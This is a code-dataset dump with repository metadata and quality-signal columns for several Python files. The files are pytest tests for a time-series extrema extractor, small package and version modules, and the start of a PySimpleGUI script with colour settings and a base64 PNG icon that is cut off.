hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3e00c038d9c05244d719af37b568a13c6c82597f | 8,852 | py | Python | tests/python/unit/dku_timeseries/extrema_extraction/test_extrema_long_format.py | dataiku/dss-plugin-timeseries-preparation | bdb662c909a0ad6d7845325a70e3dac2bdcc6b28 | [
"Apache-2.0"
] | 2 | 2021-03-12T10:48:20.000Z | 2021-04-23T09:37:18.000Z | tests/python/unit/dku_timeseries/extrema_extraction/test_extrema_long_format.py | dataiku/dss-plugin-timeseries-preparation | bdb662c909a0ad6d7845325a70e3dac2bdcc6b28 | [
"Apache-2.0"
] | 27 | 2020-07-22T15:49:25.000Z | 2021-06-18T09:40:48.000Z | tests/python/unit/dku_timeseries/extrema_extraction/test_extrema_long_format.py | dataiku/dss-plugin-timeseries-preparation | bdb662c909a0ad6d7845325a70e3dac2bdcc6b28 | [
"Apache-2.0"
] | 1 | 2021-06-01T12:49:53.000Z | 2021-06-01T12:49:53.000Z | import os
import sys
import numpy as np
import pandas as pd
import pytest
plugin_root = os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname((os.path.dirname(os.path.dirname(os.path.realpath(__file__))))))))
sys.path.append(os.path.join(plugin_root, 'python-lib'))
from dku_timeseries import ExtremaExtractor
from recipe_config_loading import get_extrema_extraction_params
@pytest.fixture
def columns():
class COLUMNS:
date = "Date"
extrema = "value1"
return COLUMNS
@pytest.fixture
def df(columns):
co2 = [315.58, 316.39, 316.79, 316.2]
country = ["first", "first", "second", "second"]
time_index = pd.date_range("1-1-1959", periods=4, freq="M")
df = pd.DataFrame.from_dict(
{columns.extrema: co2, "value2": co2, "country": country, columns.date: time_index})
return df
@pytest.fixture
def long_df(columns):
co2 = [315.58, 316.39, 316.79, 316.2, 345, 234, 100, 299]
nan = np.ones(8) * np.nan
country = ["first", "first", "first", "first", "second", "second", "second", "second"]
half_nan = [np.nan, np.nan, np.nan, np.nan, 1, 2, 3, 4]
time_index = pd.date_range("1-1-1959", periods=4, freq="D").append(pd.date_range("1-1-1959", periods=4, freq="D"))
df = pd.DataFrame.from_dict(
{columns.extrema: co2, "value2": co2, "country": country, "nan": nan, "half_nan": half_nan, columns.date: time_index})
return df
@pytest.fixture
def long_df_2(columns):
co2 = [315.58, 316.39, 316.79, 316.2, 9, 10]
half_nan = [np.nan, np.nan, 7, 2, 1, 2]
country = ["first", "first", "second", "second", "third", "third"]
country_2 = ["first", "first", "second", "second", "third", "third"]
time_index = pd.date_range("1-1-1959", periods=2, freq="M").append(pd.date_range("1-1-1959", periods=2, freq="M")).append(
pd.date_range("1-1-1959", periods=2, freq="M"))
df = pd.DataFrame.from_dict(
{columns.extrema: co2, "value2": co2, "country": country, "item": country_2, "half_nan": half_nan, columns.date: time_index})
return df
@pytest.fixture
def long_df_3(columns):
co2 = [315.58, 316.39, 316.79, 316.2, 9, 10, 2, 3]
country = ["first", "first", "second", "second", "third", "third", "fourth", "fourth"]
country_2 = ["first", "first", "second", "second", "third", "third", "fourth", "fourth"]
country_3 = ["first", "first", "second", "second", "third", "third", "fourth", "fourth"]
time_index = pd.date_range("1-1-1959", periods=2, freq="M").append(pd.date_range("1-1-1959", periods=2, freq="M")).append(
pd.date_range("1-1-1959", periods=2, freq="M")).append(pd.date_range("1-1-1959", periods=2, freq="M"))
df = pd.DataFrame.from_dict(
{columns.extrema: co2, "value2": co2, "country": country, "item": country_2, "store": country_3, columns.date: time_index})
return df
@pytest.fixture
def long_df_4(columns):
co2 = [315.58, 316.39, 316.79, 316.2, 9, 10, 2, 3]
country = ["first", "first", "second", "second", "third", "third", "first", "first"]
country_2 = ["first", "first", "second", "second", "third", "third", "second", "first"]
country_3 = ["first", "first", "second", "second", "third", "third", "third", "fourth"]
time_index = pd.date_range("1-1-2020", periods=2, freq="M").append(pd.date_range("1-1-2020", periods=2, freq="M")).append(
pd.date_range("1-1-2020", periods=2, freq="M")).append(pd.date_range("1-1-2020", periods=2, freq="M"))
df = pd.DataFrame.from_dict(
{columns.extrema: co2, "value2": co2, "country": country, "item": country_2, "store": country_3, columns.date: time_index})
return df
@pytest.fixture
def long_df_numerical(columns):
co2 = [315.58, 316.39, 316.79, 316.2, 345, 234, 100, 299]
country = [1, 1, 1, 1, 2, 2, 2, 2]
time_index = pd.date_range("1-1-1959", periods=4, freq="D").append(pd.date_range("1-1-1959", periods=4, freq="D"))
df = pd.DataFrame.from_dict(
{columns.extrema: co2, "value2": co2, "country": country, columns.date: time_index})
return df
@pytest.fixture
def recipe_config(columns):
config = {u'window_type': u'none', u'groupby_columns': [u'country'], u'closed_option': u'left', u'window_unit': u'seconds', u'window_width': 1,
u'causal_window': False, columns.date: u'Date', u'advanced_activated': True, u'extrema_column': columns.extrema, u'extrema_type': u'max',
u'aggregation_types': [u'average'], u'gaussian_std': 1}
return config
@pytest.fixture
def params(recipe_config):
return get_extrema_extraction_params(recipe_config)
class TestExtremaLongFormat:
def test_long_format(self, long_df, params, recipe_config, columns):
groupby_columns = ["country"]
extrema_extractor = ExtremaExtractor(params)
output_df = extrema_extractor.compute(long_df, columns.date, columns.extrema, groupby_columns=groupby_columns)
np.testing.assert_array_equal(output_df[columns.date].values, pd.DatetimeIndex(['1959-01-03T00:00:00.000000000', '1959-01-01T00:00:00.000000000']))
np.testing.assert_array_equal(output_df.country.values, np.array(["first", "second"]))
extrema_column = "nan"
output_df = extrema_extractor.compute(long_df, columns.date, extrema_column, groupby_columns=groupby_columns)
assert output_df.shape == (2, 1)
extrema_column = "half_nan"
output_df = extrema_extractor.compute(long_df, columns.date, extrema_column, groupby_columns=groupby_columns)
assert output_df.shape == (2, 6)
def test_two_identifiers(self, long_df_2, params, recipe_config, columns):
groupby_columns = ["country", "item"]
extrema_extractor = ExtremaExtractor(params)
output_df = extrema_extractor.compute(long_df_2, columns.date, columns.extrema, groupby_columns=groupby_columns)
np.testing.assert_array_equal(output_df[columns.date].values, pd.DatetimeIndex(['1959-02-28T00:00:00.000000000', '1959-01-31T00:00:00.000000000',
'1959-02-28T00:00:00.000000000']))
extrema_column = "half_nan"
output_df = extrema_extractor.compute(long_df_2, columns.date, extrema_column, groupby_columns=groupby_columns)
np.testing.assert_array_equal(output_df.half_nan.values, np.array([np.nan, 7., 2.]))
assert output_df.shape == (3, 6)
def test_three_identifiers(self, long_df_3, params, recipe_config, columns):
groupby_columns = ["country", "item", "store"]
extrema_extractor = ExtremaExtractor(params)
output_df = extrema_extractor.compute(long_df_3, columns.date, columns.extrema, groupby_columns=groupby_columns)
np.testing.assert_array_equal(output_df[columns.date].values, pd.DatetimeIndex(['1959-02-28T00:00:00.000000000', '1959-02-28T00:00:00.000000000',
'1959-01-31T00:00:00.000000000', '1959-02-28T00:00:00.000000000']))
def test_mix_identifiers(self, long_df_4, params, recipe_config, columns):
groupby_columns = ["country", "item", "store"]
extrema_extractor = ExtremaExtractor(params)
output_df = extrema_extractor.compute(long_df_4, columns.date, columns.extrema, groupby_columns=groupby_columns)
np.testing.assert_array_equal(output_df[columns.date].values, pd.DatetimeIndex(['2020-02-29T00:00:00.000000000', '2020-02-29T00:00:00.000000000',
'2020-01-31T00:00:00.000000000', '2020-01-31T00:00:00.000000000',
'2020-02-29T00:00:00.000000000']))
def test_empty_identifiers(self, df, params, recipe_config, columns):
extrema_extractor = ExtremaExtractor(params)
output_df = extrema_extractor.compute(df, columns.date, columns.extrema, groupby_columns=[])
assert output_df.shape == (1, 4)
output_df = extrema_extractor.compute(df, columns.date, columns.extrema)
assert output_df.shape == (1, 4)
output_df = extrema_extractor.compute(df, columns.date, columns.extrema, groupby_columns=None)
assert output_df.shape == (1, 4)
def test_long_format_numerical(self, long_df_numerical, params, recipe_config, columns):
groupby_columns = ["country"]
extrema_extractor = ExtremaExtractor(params)
output_df = extrema_extractor.compute(long_df_numerical, columns.date, columns.extrema, groupby_columns=groupby_columns)
np.testing.assert_array_equal(output_df[columns.date].values, pd.DatetimeIndex(['1959-01-03T00:00:00.000000000', '1959-01-01T00:00:00.000000000']))
np.testing.assert_array_equal(output_df.country.values, np.array([1, 2]))
| 53.648485 | 155 | 0.655897 | 1,224 | 8,852 | 4.564542 | 0.107843 | 0.035797 | 0.031502 | 0.034365 | 0.807589 | 0.799893 | 0.787006 | 0.77394 | 0.730267 | 0.703061 | 0 | 0.098558 | 0.185043 | 8,852 | 164 | 156 | 53.97561 | 0.675908 | 0 | 0 | 0.390977 | 0 | 0 | 0.15906 | 0.052418 | 0 | 0 | 0 | 0 | 0.105263 | 1 | 0.112782 | false | 0 | 0.052632 | 0.007519 | 0.263158 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
3e16dd32cb75ba86a1ea002365e89f8611e80166 | 42 | py | Python | Segment_Transparent_Objects/segmentron/__init__.py | gauthamnarayan/transparent_liquid_segmentation_icra2022 | 692a59a5fc5a771d1e8cb65fe4588514db2568fe | [
"MIT"
] | 654 | 2019-11-16T16:12:06.000Z | 2022-03-31T16:55:34.000Z | segmentron/__init__.py | djx2726889/Trans2Seg | 3972916bba7f985ca1aabc047fea56bdec9e9e5d | [
"Apache-2.0"
] | 66 | 2019-11-25T02:15:33.000Z | 2021-11-15T02:54:49.000Z | segmentron/__init__.py | djx2726889/Trans2Seg | 3972916bba7f985ca1aabc047fea56bdec9e9e5d | [
"Apache-2.0"
] | 145 | 2019-11-16T16:12:10.000Z | 2022-03-31T07:21:09.000Z | from . import modules, models, utils, data | 42 | 42 | 0.761905 | 6 | 42 | 5.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 42 | 1 | 42 | 42 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
3e17152010865af19ce8abc6dbceab44b2bc832b | 104 | py | Python | pyabstractapi/version.py | zaibacu/PyAbstractApi | 6aa148f917e8ff7f58950f8c29fe01e3bcfb69e5 | [
"MIT"
] | null | null | null | pyabstractapi/version.py | zaibacu/PyAbstractApi | 6aa148f917e8ff7f58950f8c29fe01e3bcfb69e5 | [
"MIT"
] | null | null | null | pyabstractapi/version.py | zaibacu/PyAbstractApi | 6aa148f917e8ff7f58950f8c29fe01e3bcfb69e5 | [
"MIT"
] | null | null | null | VERSION = (0, 0, 2)
def get_version(version=VERSION):
return ".".join(map(lambda x: str(x), version)) | 20.8 | 48 | 0.663462 | 17 | 104 | 4 | 0.647059 | 0.411765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033333 | 0.134615 | 104 | 5 | 48 | 20.8 | 0.722222 | 0 | 0 | 0 | 0 | 0 | 0.009524 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0.333333 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
3e1e88fa634799c08052fcea50fae6ad3950376c | 31,515 | py | Python | src/gui.py | AhmetKaanGuney/RandomSyllables | b4601ce24b6628aee78347368b7da4cc477211f6 | [
"MIT"
] | null | null | null | src/gui.py | AhmetKaanGuney/RandomSyllables | b4601ce24b6628aee78347368b7da4cc477211f6 | [
"MIT"
] | null | null | null | src/gui.py | AhmetKaanGuney/RandomSyllables | b4601ce24b6628aee78347368b7da4cc477211f6 | [
"MIT"
] | null | null | null | import PySimpleGUI as sg
white = "#fff9e5"
# sweet_green = "#567b79"
sweet_red = "#61363d"
sweet_light_red = "#8b6962"
vibrant_red = "#c13d37"
# sweet_brown = "#80493a"
sg.theme_background_color(sweet_red)
sg.theme_element_background_color(sweet_red)
sg.theme_text_element_background_color(sweet_red)
sg.theme_text_color(white)
sg.theme_button_color(vibrant_red)
logo_image = r'C:\Users\ahmet\PycharmProjects\RandomSyllables\src\resources\logo.png'
icon = b'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